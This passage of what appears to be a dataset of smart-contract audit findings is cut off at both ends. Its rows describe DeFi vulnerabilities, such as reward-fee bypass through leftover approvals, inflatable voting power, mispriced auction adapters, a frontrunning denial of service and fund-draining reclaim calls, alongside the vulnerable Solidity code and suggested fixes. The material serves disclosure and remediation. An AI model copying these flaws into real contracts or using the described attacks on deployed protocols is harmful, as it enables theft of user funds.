This causes loss to the user as too many fees are taken from them.",Use the same order as ConvexSpell and sell rewards BEFORE burning BLP,User will lose funds due to incorrect fees,"```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n" +Adversary can abuse hanging approvals left by PSwapLib.swap to bypass reward fees,medium,"AuraSpell.sol#L247-L257\\n```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n\\nAuraSpell#closePositionFarm allows the user to specify any expectedRewards they wish. This allows the user to approve any amount, even if the amount is much larger than they would otherwise use. The can abuse these hanging approvals to swap tokens out of order and avoid paying reward fees.\\nExample: Assume there are two rewards, token A and token B. Over time a user's position accumulates 100 rewards for each token. Normally the user would have to pay fees on those rewards. However they can bypass it by first creating hanging approvals. The user would start by redeeming a very small amount of LP and setting expectedRewards to uint256.max. They wouldn't sell the small amount leaving a very large approval left for both tokens. Now the user withdraws the rest of their position. This time they specify the swap data to swap token B first. 
The user still has to pay fees on token A but now they have traded token B before any fees can be taken on it.",After the swap reset allowances to 0,User can bypass reward fees,"```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n" +ConvexSpell is completely broken for any curve LP that utilizes native ETH,medium,"ConvexSpell.sol#L120-L127\\n```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n\\nConvexSpell#openPositionFarm attempts to call balanceOf on each component of the LP. Since native ETH uses the `0xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee` this call will always revert. This breaks compatibility with EVERY curve pool that uses native ETH which make most of the highest volume pools on the platfrom.",I would recommend conversion between native ETH and wETH to prevent this issue.,ConvexSpell is completely incompatible with a majority of Curve pools,"```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n" +WAuraPools doesn't correctly account for AuraStash causing all deposits to be permanently lost,medium,"WAuraPools.sol#L413-L418\\n```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n\\nWhen burning the wrapped LP token, it attempts to transfer each token to msg.sender. 
The problem is that stash AURA cannot be transferred like a regular ERC20 token and any transfers will revert. Since this will be called on every attempted withdraw, all deposits will be permanently unrecoverable.",Check if reward is stash AURA and send regular AURA instead similar to what is done in AuraSpell.,All deposits will be permanently unrecoverable,"```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n" +AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`,medium,"In AuraSpell, the `openPositionFarm` will call `joinPool` in Balancer's vault. But when analyzing the `JoinPoolRequest` struct, we see an issue on `maxAmountsIn` and `amountsIn` which can be in different length, thus this will be reverted since in Balancer's vault, these two arrays should be the same length.\\n```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. 
Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n } else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n\\nthese `maxAmountsIn` and `amountsIn` are coming from `_getJoinPoolParamsAndApprove`. And by seeing the function, we can see that there is possible issue when the `tokens[i] == lpToken`.\\nWhen `tokens[i] == lpToken`, the flag `isLPIncluded` will be true. And will enter this block,\\n```\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n```\\n\\nthis will decrease the `amountsIn` length. 
Thus, `amountsIn` and `maxAmountsIn` will be in different length.\\nIn Balancer's `JoinPoolRequest` struct, the `maxAmountsIn`, and `userData` second decoded bytes (amountsIn) should be the same array length, because it will be checked in Balancer.\\n```\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n```\\n\\nTherefore, in this situation, it will be reverted.",Issue AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`\\nRemove the assembly code where it will decrease the `amountsIn` length when `isLPIncluded` is true to make sure the array length are same.,User can't open position on AuraSpell when `tokens` contains `lpToken`,"```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n 
} else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n" +"""Votes"" balance can be increased indefinitely in multiple contracts",high,"The ""voting power"" can be easily manipulated in the following contracts:\\n`ContinuousVestingMerkle`\\n`PriceTierVestingMerkle`\\n`PriceTierVestingSale_2_0`\\n`TrancheVestingMerkle`\\n`CrosschainMerkleDistributor`\\n`CrosschainContinuousVestingMerkle`\\n`CrosschainTrancheVestingMerkle`\\nAll the contracts inheriting from the contracts listed above\\nThis is caused by the public `initializeDistributionRecord()` function that can be recalled multiple times without any kind of access control:\\n```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n\\nThe `AdvancedDistributor` abstract contract which inherits from the `ERC20Votes`, `ERC20Permit` and `ERC20` contracts, distributes tokens to beneficiaries with voting-while-vesting and administrative controls. Basically, before the tokens are vested/claimed by a certain group of users, these users can use these `ERC20` tokens to vote. 
These tokens are minted through the `_initializeDistributionRecord()` function:\\n```\\n function _initializeDistributionRecord(\\n address beneficiary,\\n uint256 totalAmount\\n ) internal virtual override {\\n super._initializeDistributionRecord(beneficiary, totalAmount);\\n\\n // add voting power through ERC20Votes extension\\n _mint(beneficiary, tokensToVotes(totalAmount));\\n }\\n```\\n\\nAs mentioned in the Tokensoft Discord channel these ERC20 tokens minted are used to track an address's unvested token balance, so that other projects can utilize 'voting while vesting'.\\nA user can simply call as many times as he wishes the `initializeDistributionRecord()` function with a valid merkle proof. With each call, the `totalAmount` of tokens will be minted. Then, the user simply can call `delegate()` and delegate those votes to himself, ""recording"" the inflated voting power.","Only allow users to call once the `initializeDistributionRecord()` function. Consider using a mapping to store if the function was called previously or not. Keep also in mind that fully vested and claimed users should not be able to call this function and if they do, the total amount of tokens that should be minted should be 0 or proportional/related to the amount of tokens that they have already claimed.",The issue totally breaks the 'voting while vesting' design. 
Any DAO/project using these contracts to determine their voting power could be easily manipulated/exploited.,"```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n" +`SafeERC20.safeApprove` reverts for changing existing approvals,medium,"`SafeERC20.safeApprove` reverts when a non-zero approval is changed to a non-zero approval. The `CrosschainDistributor._setTotal` function tries to change an existing approval to a non-zero value which will revert.\\nThe safeApprove function has explicit warning:\\n```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n\\nBut still the `_setTotal` use it to change approval amount:\\n```\\n function _allowConnext(uint256 amount) internal {\\n token.safeApprove(address(connext), amount);\\n }\\n\\n /** Reset Connext allowance when total is updated */\\n function _setTotal(uint256 _total) internal virtual override onlyOwner {\\n super._setTotal(_total);\\n _allowConnext(total - claimed);\\n }\\n```\\n",Consider using 'safeIncreaseAllowance' and 'safeDecreaseAllowance' instead of `safeApprove` in `_setTotal`.,Due to this bug all calls to `setTotal` function of `CrosschainContinuousVestingMerkle` and `CrosschainTrancheVestingMerkle` will get reverted.\\nTokensoft airdrop protocol is meant to be used by other protocols and the ability to change `total` parameter is an intended offering. This feature will be important for those external protocols due to the different nature & requirement of every airdrop. 
But this feature will not be usable by airdrop owners due to the incorrect code implementation.,"```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n" +CrosschainDistributor: Not paying relayer fee when calling xcall to claim tokens to other domains,medium,"CrosschainDistributor is not paying relayer fee when calling xcall to claim tokens to other domains. The transaction will not be relayed on target chain to finnalize the claim. User will not receive the claimed tokens unless they bump the transaction fee themself.\\nIn `_settleClaim`, the CrosschainDistributor is using xcall to claim tokens to another domain. But relayer fee is not payed.\\n```\\n id = connext.xcall( // <------ relayer fee should be payed here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n\\nWithout the relayer fee, the transaction will not be relayed. 
The user will need to bump the relayer fee to finally settle the claim by following the instructions here in the connext doc.",Help user bump the transaction fee in Satellite.,User will not receive their claimed tokens on target chain.,"```\\n id = connext.xcall( // <------ relayer fee should be payed here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n" +Loss of funds during user adjusting,medium,"Adjusting a user's total claimable value not working correctly\\nWhenever the owner is adjusting user's total claimable value, the `records[beneficiary].total` is decreased or increased by `uint256 diff = uint256(amount > 0 ? amount : -amount);`.\\nHowever some assumptions made are not correct. Scenario:\\nUser has bought 200 FOO tokens for example.\\nIn `PriceTierVestingSale_2_0.sol` he calls the `initializeDistributionRecord` which sets his `records[beneficiary].total` to the purchased amount || 200. So `records[beneficiary].total` = 200\\nAfter that the owner decides to adjust his `records[beneficiary].total` to 300. So `records[beneficiary].total` = 300\\nUser decides to `claim` his claimable amount which should be equal to 300. 
He calls the `claim` function in `PriceTierVestingSale_2_0.sol`.\\n```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n\\nAs we can see here the `_executeClaim` is called with the `purchasedAmount` of the user which is still 200.\\n```\\nfunction _executeClaim(\\n address beneficiary,\\n uint256 _totalAmount\\n ) internal virtual returns (uint256) {\\n uint120 totalAmount = uint120(_totalAmount);\\n\\n // effects\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n \\n uint120 claimableAmount = uint120(getClaimableAmount(beneficiary));\\n require(claimableAmount > 0, 'Distributor: no more tokens claimable right now');\\n\\n records[beneficiary].claimed += claimableAmount;\\n claimed += claimableAmount;\\n\\n return claimableAmount;\\n }\\n```\\n\\nNow check the `if` statement:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n```\\n\\nThe point of this is if the `total` of the user has been adjusted, to re-initialize to the corresponding amount, but since it's updated by the input value which is 200, records[beneficiary].total = 200 , the user will lose the 100 added from the owner during the `adjust`","I am not sure if it is enough to just set it the following way:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n `--` _initializeDistributionRecord(beneficiary, 
totalAmount);\\n `++` _initializeDistributionRecord(beneficiary, records[beneficiary].total);\\n }\\n```\\n\\nThink of different scenarios if it is done that way and also keep in mind that the same holds for the decrease of `records[beneficiary].total` by `adjust`",Loss of funds for the user and the protocol,"```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n" +Exponential and logarithmic price adapters will return incorrect pricing when moving from higher dp token to lower dp token,medium,"The exponential and logarithmic price adapters do not work correctly when used with token pricing of different decimal places. This is because the resolution of the underlying expWad and lnWad functions is not fit for tokens that aren't 18 dp.\\nAuctionRebalanceModuleV1.sol#L856-L858\\n```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n\\nThe price returned by the adapter is used directly to call _calculateQuoteAssetQuantity which uses preciseMul/preciseMulCeil to convert from component amount to quote amount. Assume we wish to sell 1 WETH for 2,000 USDT. 
WETH is 18dp while USDT is 6dp giving us the following price:\\n```\\n1e18 * price / 1e18 = 2000e6\\n```\\n\\nSolving for price gives:\\n```\\nprice = 2000e6\\n```\\n\\nThis establishes that the price must be scaled to:\\n```\\nprice dp = 18 - component dp + quote dp\\n```\\n\\nPlugging in our values we see that our scaling of 6 dp makes sense.\\nBoundedStepwiseExponentialPriceAdapter.sol#L67-L80\\n```\\n uint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\n // Protect against priceChange overflow\\n if (scalingFactor > type(uint256).max / expExpression) {\\n return _getBoundaryPrice(isDecreasing, maxPrice, minPrice);\\n }\\n uint256 priceChange = scalingFactor * expExpression - WAD;\\n\\n if (isDecreasing) {\\n // Protect against price underflow\\n if (priceChange > initialPrice) {\\n return minPrice;\\n }\\n return FixedPointMathLib.max(initialPrice - priceChange , minPrice);\\n```\\n\\nGiven the pricing code and notably the simple scalingFactor it also means that priceChange must be in the same order of magnitude as the price which in this case is 6 dp. The issue is that on such small scales, both lnWad and expWad do not behave as expected and instead yield a linear behavior. This is problematic as the curve will produce unexpected behaviors under these circumstances selling the tokens at the wrong price. Since both functions are written in assembly it is very difficult to determine exactly what is going on or why this occurs but testing in remix gives the following values:\\n```\\nexpWad(1e6) - WAD = 1e6\\nexpWad(5e6) - WAD = 5e6\\nexpWad(10e6) - WAD = 10e6\\nexpWad(1000e6) - WAD = 1000e6\\n```\\n\\nAs seen above these value create a perfect linear scaling and don't exhibit any exponential qualities. Given the range of this linearity it means that these adapters can never work when selling from higher to lower dp tokens.",scalingFactor should be scaled to 18 dp then applied via preciseMul instead of simple multiplication. 
This allows lnWad and expWad to execute in 18 dp then be scaled down to the correct dp.,Exponential and logarithmic pricing is wrong when tokens have mismatched dp,"```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n" +SetToken can't be unlocked early.,medium,"SetToken can't be unlocked early\\nThe function unlock() is used to unlock the setToken after rebalancing, as how it is right now there are two ways to unlock the setToken.\\ncan be unlocked once the rebalance duration has elapsed\\ncan be unlocked early if all targets are met, there is excess or at-target quote asset, and raiseTargetPercentage is zero\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, ""Cannot unlock early unless all targets are met and raiseTargetPercentage is zero"");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n\\n```\\n function _canUnlockEarly(ISetToken _setToken) internal view returns (bool) {\\n RebalanceInfo storage rebalance = rebalanceInfo[_setToken];\\n return _allTargetsMet(_setToken) && _isQuoteAssetExcessOrAtTarget(_setToken) && rebalance.raiseTargetPercentage == 0;\\n }\\n```\\n\\nThe main problem occurs as the value of raiseTargetPercentage isn't reset after rebalancing. 
The other thing is that the function setRaiseTargetPercentage can't be used to fix this issue as it doesn't allow giving raiseTargetPercentage a zero value.\\nA setToken can use the AuctionModule to rebalance multiple times, duo to the fact that raiseTargetPercentage value isn't reset after every rebalancing. Once changed with the help of the function setRaiseTargetPercentage this value will only be non zero for every next rebalancing. A setToken can be unlocked early only if all other requirements are met and the raiseTargetPercentage equals zero.\\nThis problem prevents for a setToken to be unlocked early on the next rebalances, once the value of the variable raiseTargetPercentage is set to non zero.\\nOn every rebalance a manager should be able to keep the value of raiseTargetPercentage to zero (so the setToken can be unlocked early), or increase it at any time with the function setRaiseTargetPercentage.\\n```\\n function setRaiseTargetPercentage(\\n ISetToken _setToken,\\n uint256 _raiseTargetPercentage\\n )\\n external\\n onlyManagerAndValidSet(_setToken)\\n {\\n // Ensure the raise target percentage is greater than 0\\n require(_raiseTargetPercentage > 0, ""Target percentage must be greater than 0"");\\n\\n // Update the raise target percentage in the RebalanceInfo struct\\n rebalanceInfo[_setToken].raiseTargetPercentage = _raiseTargetPercentage;\\n\\n // Emit an event to log the updated raise target percentage\\n emit RaiseTargetPercentageUpdated(_setToken, _raiseTargetPercentage);\\n }\\n```\\n","Recommend to reset the value raiseTargetPercentage after every rebalancing.\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, ""Cannot unlock early unless all targets 
are met and raiseTargetPercentage is zero"");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n+ rebalanceInfo[_setToken].raiseTargetPercentage = 0;\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n","Once the value of raiseTargetPercentage is set to non zero, every next rebalancing of the setToken won't be eligible for unlocking early. As the value of raiseTargetPercentage isn't reset after every rebalance and neither the manager can set it back to zero with the function setRaiseTargetPercentage().","```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, ""Cannot unlock early unless all targets are met and raiseTargetPercentage is zero"");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n" +price is calculated wrongly in BoundedStepwiseExponentialPriceAdapter,medium,"The BoundedStepwiseExponentialPriceAdapter contract is trying to implement price change as `scalingFactor * (e^x - 1)` but the code implements `scalingFactor * e^x - 1`. Since there are no brackets, multiplication would be executed before subtraction. 
And this has been confirmed with one of the team members.\\nThe getPrice code has been simplified as the following when boundary/edge cases are ignored\\n```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n\\nWhen timeBucket is 0, we want priceChange to be 0, so that the returned price would be the initial price. Since `e^0 = 1`, we need to subtract 1 (in WAD) from the `expExpression`.\\nHowever, with the incorrect implementation, the returned price would be different than real price by a value equal to `scalingFactor - 1`. The image below shows the difference between the right and wrong formula when initialPrice is 100 and scalingFactor is 11. 
The right formula starts at 100 while the wrong one starts at 110=100+11-1\\n",Change the following line\\n```\\n- uint256 priceChange = scalingFactor * expExpression - WAD;\\n+ uint256 priceChange = scalingFactor * (expExpression - WAD);\\n```\\n,Incorrect price is returned from BoundedStepwiseExponentialPriceAdapter and that will have devastating effects on rebalance.,"```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n" +Full inventory asset purchases can be DOS'd via frontrunning,medium,"Users who attempt to swap the entire component value can be frontrun with a very small bid making their transaction revert\\nAuctionRebalanceModuleV1.sol#L795-L796\\n```\\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\\n require(_componentQuantity <= bidInfo.auctionQuantity, ""Bid size exceeds auction quantity"");\\n```\\n\\nWhen creating a bid, it enforces the above requirement. This prevents users from buying more than they should but it is also a source of an easy DOS attack. Assume a user is trying to buy the entire balance of a component, a malicious user can frontrun them buying only a tiny amount. Since they requested the entire balance, the call with fail. 
This is a useful technique if an attacker wants to DOS other buyers to pass the time and get a better price from the Dutch auction.",Allow users to specify type(uint256).max to swap the entire available balance,Malicious user can DOS legitimate users attempting to purchase the entire amount of component,"```\\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\\n require(_componentQuantity <= bidInfo.auctionQuantity, ""Bid size exceeds auction quantity"");\\n```\\n" +All fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedly,high,"All fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedly\\nWhen mint an option token, the user is required to transfer the payout token for a call option or quote token for a put option\\nif after the expiration, the receiver can call reclaim to claim the payout token if the option type is call or claim the quote token if the option type is put\\nhowever, the root cause is when reclaim the token, the corresponding option is not burnt (code)\\n```\\n // Revert if caller is not receiver\\n if (msg.sender != receiver) revert Teller_NotAuthorized();\\n\\n // Transfer remaining collateral to receiver\\n uint256 amount = optionToken.totalSupply();\\n if (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n } else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n }\\n```\\n\\nthe Teller contract is likely to hold fund from multiple option token\\na malicious actor can create call Teller#deploy and set a receiver address that can control by himself\\nand then wait for the option expiry and repeated call reclaim to steal the fund from the Teller contract",Burn the corresponding option token when reclaiming the fund,All fund from Teller contract can be 
drained because a malicious receiver can call reclaim repeatedly,"```\\n // Revert if caller is not receiver\\n if (msg.sender != receiver) revert Teller_NotAuthorized();\\n\\n // Transfer remaining collateral to receiver\\n uint256 amount = optionToken.totalSupply();\\n if (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n } else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n }\\n```\\n" +All funds can be stolen from FixedStrikeOptionTeller using a token with malicious decimals,high,"`FixedStrikeOptionTeller` is a single contract which deploys multiple option tokens. Hence this single contract holds significant payout/quote tokens as collateral. Also the `deploy`, `create` & `exercise` functions of this contract can be called by anyone.\\nThis mechanism can be exploited to drain `FixedStrikeOptionTeller` of all tokens.\\nThis is how the create functions looks like:\\n```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n }\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n\\nexercise function:\\n```\\n function exercise(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n if (msg.sender != receiver) {\\n // rest of code\\n }\\n\\n optionToken.burn(msg.sender, amount_);\\n\\n if (call) {\\n // rest of code\\n } else {\\n quoteToken.safeTransfer(msg.sender, quoteAmount);\\n }\\n }\\n```\\n\\nConsider this attack 
